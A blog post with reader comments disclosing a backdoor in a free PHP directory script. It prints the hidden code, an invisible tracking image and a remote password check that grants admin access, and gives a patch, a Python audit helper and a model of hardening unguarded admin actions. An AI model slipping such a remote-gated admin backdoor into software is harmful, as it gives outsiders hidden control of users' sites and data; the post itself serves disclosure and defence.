Free Directory Software: Why Not Put in a few Programming Eggs?
Because it is pretty damn bogus.
[update: Javier has removed the database access egg from his script.]
Tons of new directories are springing up using the Free PHP Directory Script created by Javier García Esteban (of Directory-Search or Biz-Directory). While his download page states "the script runs without known bugs with PHP4 and MySQL3," the script also ran with known eggs put in the programming.
Anyone who puts eggs in their software so they can have backdoor access to anyone using it does not have the best intentions for their users.
The two eggs I have been told about are:
- On line 62 of install_4.php - sends a referer to his directory:
    <IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1>
- On line 60 of include.php (one long line; must scroll to the right) - allowed Javier database access:
    if ($pass) {
        $access = fopen ("http://www.directory-search.org/include_variables.php?p=$pass","r");
        $access = fread($access,4);
        if ($access == "true"){
            session_start();
            $HTTP_SESSION_VARS['admin'] = true;
            header("Location: {$dir}admin_edit.php");
        };
    };
The first egg is harmless. It only identifies new installations. The second egg gave Javier access to your database.
The eggs are not hard to remove from the directory script. If you have an old version of the script you may want to remove the eggs.
- You can replace the image in the first egg with your own image or just delete that line of code. That first egg really is no big deal.
- The second egg is complete crap. [added: The second egg gives Javier backdoor access to the script. After I posted this Javier stated that he removed that egg. It is a shame that it was ever there in the first place.]
To remove the second egg you need to remove that above part on line 60 (scroll way to the right) of include.php and replace it with:
if ($pass) {
    $rand = md5(time());
    // no URL any more: fopen() fails on this bogus local name, so $access can never read "true"
    $access = fopen ("p=$rand","r");
    $access = fread($access,4);
    if ($access == "true") {
        session_start();
        $HTTP_SESSION_VARS['admin'] = true;
        header("Location: {$dir}admin_edit.php");
    };
};
(at least this is what I did)
I also changed my phpMyAdmin panel login password after I changed the script. Javier stated that the password was never sent even when the egg was there; he was just using it for backdoor access, as he states in his comment below. He also stated that the place the database access was sent to now returns a 404 error.
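As an added example (not code from this post or from the Free PHP Directory Script), here is a small Python audit helper that flags both egg shapes in a PHP file: an HTML beacon or server-side fetch that reaches a host other than your own, and an admin session flag set inside an if-block whose condition depends on what such a fetch returned. The regexes, the brace-depth tracking, the hostname www.example-directory.com and all samples except the two lines quoted above are constructed assumptions; the "neutralised" sample is the replacement code shown above.

```python
"""Audit helper for a downloaded PHP script: flags HTML beacons and server-side
fetches that reach a foreign host, and the backdoor shape where an admin session
flag is set inside an if-block conditioned on what such a fetch returned.
Added, heuristic example for this post; not the Free PHP Directory Script's code."""
import re

FETCH_FUNCS = r'(?:fopen|file_get_contents|file|readfile|curl_init)'
# fetch_func("http://host/...")  -> a server-side request to host
FETCH_URL = re.compile(r'\b' + FETCH_FUNCS + r'\s*\(\s*["\']?(https?://[^"\'\s)]+)', re.I)
# $var = fetch_func("http://host/...")  -> $var now holds data chosen by host
TAINT_SOURCE = re.compile(r'\$(\w+)\s*=\s*' + FETCH_FUNCS + r'\s*\(\s*["\']?(https?://[^"\'\s)]+)', re.I)
ASSIGN = re.compile(r'\$(\w+)\s*=(?!=)\s*([^;]*)')           # $lhs = rhs;
IF_COND = re.compile(r'\bif\s*\(([^)]*)\)', re.I)           # if ( cond )
# Session flag flipped to admin, PHP4 ($HTTP_SESSION_VARS) or PHP5 ($_SESSION)
PRIV_GRANT = re.compile(r'\$(?:HTTP_SESSION_VARS|_SESSION)\s*\[\s*["\']\w*(?:admin|auth|login)\w*["\']\s*\]'
                        r'\s*=(?!=)\s*(?:true|1)\b', re.I)
# HTML that makes every visitor's browser request a resource from host
HTML_BEACON = re.compile(r'<(?:img|script|iframe)\b[^>]*\bsrc\s*=\s*["\']?(https?://[^"\'\s>]+)', re.I)
HOST = re.compile(r'^https?://([^/:?#]+)', re.I)


def _host(url):
    m = HOST.match(url)
    return (m.group(1) if m else url).lower()


def _mentions(var, text):
    return re.search(r'\$' + re.escape(var) + r'\b', text) is not None


def audit_php(source, own_hosts=()):
    """Return [(line, kind, detail)] for one PHP source text.

    kind: 'beacon' (HTML src on a foreign host), 'phone-home' (server-side fetch
    of a foreign host) or 'remote-gated-admin' (admin flag set inside an if whose
    condition uses a variable derived from such a fetch)."""
    own = {h.lower() for h in own_hosts}
    findings, tainted, gate, depth = [], set(), None, 0
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in HTML_BEACON.finditer(line):
            if _host(m.group(1)) not in own:
                findings.append((lineno, 'beacon', _host(m.group(1))))
        for m in FETCH_URL.finditer(line):
            if _host(m.group(1)) not in own:
                findings.append((lineno, 'phone-home', _host(m.group(1))))
        for m in TAINT_SOURCE.finditer(line):
            if _host(m.group(2)) not in own:
                tainted.add(m.group(1))
        for m in ASSIGN.finditer(line):                  # $a = fread($a, 4) keeps $a tainted
            if any(_mentions(v, m.group(2)) for v in tainted):
                tainted.add(m.group(1))
        for m in IF_COND.finditer(line):                 # if ($access == "true") opens a gate
            hit = sorted(v for v in tainted if _mentions(v, m.group(1)))
            if hit:
                gate = (depth, hit[0])                   # nesting depth the if was written at
        if gate is not None and PRIV_GRANT.search(line):
            findings.append((lineno, 'remote-gated-admin', gate[1]))
        depth += line.count('{') - line.count('}')       # rough block tracking (ignores braces in strings)
        if gate is not None and depth <= gate[0]:
            gate = None                                  # the gated block has closed
    return findings


# --- constructed samples (only EGG_ONE and EGG_TWO are the lines quoted in the post) ---
EGG_ONE = '<IMG SRC="http://www.directory-search.org/img/invis.gif" WIDTH=1 HEIGHT=1>'
EGG_TWO = ('if ($pass) { $access = fopen ("http://www.directory-search.org/include_variables.php'
           '?p=$pass","r"); $access = fread($access,4); if ($access == "true"){ session_start(); '
           '$HTTP_SESSION_VARS[\'admin\'] = true; header("Location: {$dir}admin_edit.php"); }; };')
MULTILINE = """if ($pass) {
    $access = fopen("http://remote.example/check.php?p=$pass", "r");
    $access = fread($access, 4);
    if ($access == "true") {
        session_start();
        $_SESSION['admin'] = true;
    }
}"""
LOCAL_LOGIN = """$row = mysql_fetch_assoc(mysql_query("SELECT pass FROM admins WHERE user='$u'"));
if ($row && $row['pass'] == md5($p)) {
    session_start();
    $_SESSION['admin'] = true;
}"""
FEED_FETCH = '$xml = file_get_contents("http://example.net/feed.xml");'
NEUTRALISED = """if ($pass) {
    $rand = md5(time());
    $access = fopen ("p=$rand","r");
    $access = fread($access,4);
    if ($access == "true") { session_start(); $HTTP_SESSION_VARS['admin'] = true; };
};"""
SAMPLES = {'egg_one': EGG_ONE, 'egg_two': EGG_TWO, 'multiline': MULTILINE,
           'local_login': LOCAL_LOGIN, 'feed_fetch': FEED_FETCH, 'neutralised': NEUTRALISED}


def audit_samples(own_hosts=('www.example-directory.com',)):
    """Audit every sample as if it were one include.php of a site on own_hosts."""
    return {name: audit_php(src, own_hosts) for name, src in SAMPLES.items()}


if __name__ == '__main__':
    for name, found in audit_samples().items():
        print(f'{name:12} {found or "clean"}')
```

Run it over each .php file of a downloaded script before installing it (read the file and pass its text to audit_php with your own domain in own_hosts). A 'phone-home' finding alone may be legitimate, a feed fetch for instance, but 'remote-gated-admin' is exactly the backdoor shape and warrants reading that block by hand; the local-login and neutralised samples show that an ordinary password check, or the replacement code above, is not flagged. Brace counting ignores braces inside strings and the regexes miss obfuscated code, so treat the result as triage, not proof.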
Thanks to MarketingLady at V7N forums. More info about the Free PHP Directory Script Backdoor.
Comments
I'm appalled at the nature of this hack in which Javier added a backdoor entry. How can you trust ANYTHING this clown writes again?
I've posted his name on many forums, with links to this article; hopefully when people do a search for his name, the shitstorm he managed to create will render him incapable of finding another programming job again.
Good luck Javier, and suck on this!
There is no excuse for putting a backdoor.
This script SUCKS.
It erased the database after I updated so much info.
I also don't know how come.
Sometimes I have problems logging in and have to run install_3.php again. SUCKS big time.
Security cannot make it.
Seph,
How did the bots read the admin pages, and how could they delete categories?
Hi Shawn
From what I understand Seph stated that the best way to have security is to absolutely delete those two files and then to only FTP the other admin files to the server while you are using them and then delete them when you are done... Also back up your database often.
I have had no problems with the script, but I did remove the files that Seph recommended removing.
I have just uploaded a new copy of the script, and it looks like these problems I had mentioned above have been fixed.
Before you could enter a specific url into your browser and it would delete a category.....or even the database, no admin user and pass needed.
How a bot got in there, I have no idea, but I have (or had) a log file that had over 1000 entries by a bot, and it went through and deleted all links and all categories.
This happened twice to me, and the specific url to delete the database with no username and password happened three times.
Again, it seems it was fixed, but I no longer trust the script regardless of whether it was fixed.
I just feel its sick and wrong...
I've just spent the last hour reconfiguring my DB access for some 25 sites.... ;-(
I can certainly understand why a coder might want to do this, to protect their intellectual rights.
However, it obviously does damage consumer confidence - after all, some of us pay to remove the footer link, but apparently even though the product license is purchased, the backdoor still exists.
I guess the problem is that once people are alerted to this issue, it's harder for him to keep tabs on the intellectual rights. In that regard, it would actually be a very difficult issue to find a suitable compromise between developer and license purchaser.
This is why I code all my own stuff... or maybe I just like re-inventing the wheel.
What do intellectual rights have to do with sending himself database access information?
That is pretty shady, and I'm wondering what legitimate reason there would be for needing that information.
That's great that the fix for the eggs is here, but why not suggest using an alternate directory that doesn't have programming eggs? Are there no other good PHP directories available?
Likely there are some other good directory scripts out there...I mentioned the change for people who already installed the script and did not want to swap over.
Aaron, I love you but you're making a fuss out of nothing. Javier is Spanish, so it's most likely he's Catholic, and we all know catholics are good people who don't hack.
:)
something tells me you do not believe the letters you just typed there John?
I am Javier García, co-owner of Biz-Directory.org and programmer of the Free PHP Directory Script. Let me explain the things people are talking about.
First of all, we have removed the code the article talks about; we prefer not to have annoyed customers even though we have to bear abuses from other people.
The invisible image was just that, an image, unable to hurt in any way. It allowed us to keep the records of installed scripts. It was more convenient than requesting the installation url every time the script was downloaded/installed.
Regarding the backdoor, it was password-protected, so it is impossible for anybody but us to access the script, not even people with access to the script code. We added this feature several months after the first distribution of the script. We had several problems with abusive users, not only removing copyright links but also reselling the script, besides other aggressive actions. So we decided to include this tool. We have only used it once, and its use was more than justified. As the full script is distributed after the purchase, and there is no risk, it does not include this code.
Something people are wrong about: the backdoor was not sending any personal data, of course not the password, nor other user information. The only parameter sent was the "pass" variable, not used in the script (not even in the installation; in addition the installation does not include "include.php" but "include_install.php"). It was the variable we had to type in the querystring to enter the panel. Any programmer can tell this by looking at the code.
Maybe including this code was not a lucky idea, but our intention was not to retrieve personal information. Just to allow us an entrance in case of abuse.
We are sorry about any inconvenience this could have caused, but we can assure you no legal user of the script has anything to be afraid of.
Regards
Javier García
Biz Directory
This has way too many holes and back doors in it.
You don't need to sign in to the admin control panel to:
Erase the database (happened to me 3 times)
Erase Categories (happened to me 2 times)
When a bot finds its way into the admin (which doesn't need the username & password) it will crawl all links and in turn delete every category and every link (happened twice).
I did enjoy how this script worked, and the ease of setup, but security is totally dead.
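The commenters above describe admin actions that worked without logging in and a bot that deleted every category just by following links. As an added example (not the directory script's code), here is a toy Python model of that failure beside the hardened version: a delete action reachable by a plain GET with no session check, versus one that demands an admin session, a POST and a per-session CSRF token. The request model, handlers, category store, URL layout and crawler are all constructed for illustration.

```python
"""Toy model of the failure the comments describe: admin actions reachable by a
plain GET with no session check, so a crawler following the links on the admin
page deletes every category. Added example, not the script's code; the request
model, handlers and crawler are constructed for illustration."""
from dataclasses import dataclass, field
import secrets


@dataclass
class Request:
    method: str
    path: str
    params: dict = field(default_factory=dict)
    session: dict = field(default_factory=dict)   # server-side session for this client


@dataclass
class Directory:
    categories: dict = field(default_factory=lambda: {'1': 'Arts', '2': 'Business', '3': 'Computers'})


def admin_page_links(store):
    """The admin page lists one plain "delete" link per category, as a GET URL."""
    return [f'/admin_edit.php?action=delcat&id={cid}' for cid in list(store.categories)]


def vulnerable_handler(store, req):
    """Acts on any request that names the action: no session, method or token check."""
    if req.path == '/admin_edit.php' and req.params.get('action') == 'delcat':
        store.categories.pop(req.params.get('id'), None)
    return 200


def hardened_handler(store, req):
    """Requires an admin session, a POST, and the session's CSRF token before acting."""
    if req.path != '/admin_edit.php':
        return 404
    if not req.session.get('admin'):
        return 403                       # anonymous clients, crawlers included
    if req.params.get('action') == 'delcat':
        if req.method != 'POST':
            return 405                   # links and crawlers use GET; never act on it
        if req.params.get('token') != req.session.get('csrf_token'):
            return 403                   # request was not produced by our own form
        store.categories.pop(req.params.get('id'), None)
    return 200


def crawl(store, handler):
    """A crawler fetches every link found on the admin page with an anonymous GET."""
    statuses = []
    for link in admin_page_links(store):
        path, _, query = link.partition('?')
        params = dict(kv.split('=', 1) for kv in query.split('&')) if query else {}
        statuses.append(handler(store, Request('GET', path, params)))
    return statuses


def crawl_vulnerable():
    """Categories left after a crawl of the unguarded panel."""
    store = Directory()
    crawl(store, vulnerable_handler)
    return len(store.categories)


def crawl_hardened():
    """Categories left, and the statuses the crawler saw, on the hardened panel."""
    store = Directory()
    statuses = crawl(store, hardened_handler)
    return len(store.categories), statuses


def admin_delete_hardened():
    """A logged-in admin deleting category 2 through the proper POST form."""
    store = Directory()
    session = {'admin': True, 'csrf_token': secrets.token_hex(16)}
    form = {'action': 'delcat', 'id': '2', 'token': session['csrf_token']}
    status = hardened_handler(store, Request('POST', '/admin_edit.php', form, session))
    return status, sorted(store.categories)


if __name__ == '__main__':
    print('vulnerable: categories left after crawl =', crawl_vulnerable())
    print('hardened:   categories left, statuses   =', crawl_hardened())
    print('admin POST: status, categories          =', admin_delete_hardened())
```

The vulnerable handler loses all three categories to an anonymous crawl; the hardened one answers 403 to every anonymous request, 405 to a logged-in admin who merely follows a GET link, and only performs the deletion for a POST carrying the token from that admin's own session. Deleting the unused admin files from the server, as Seph suggests above, removes the reachable code entirely; the three checks here are what any admin file that stays on the server should do before changing data.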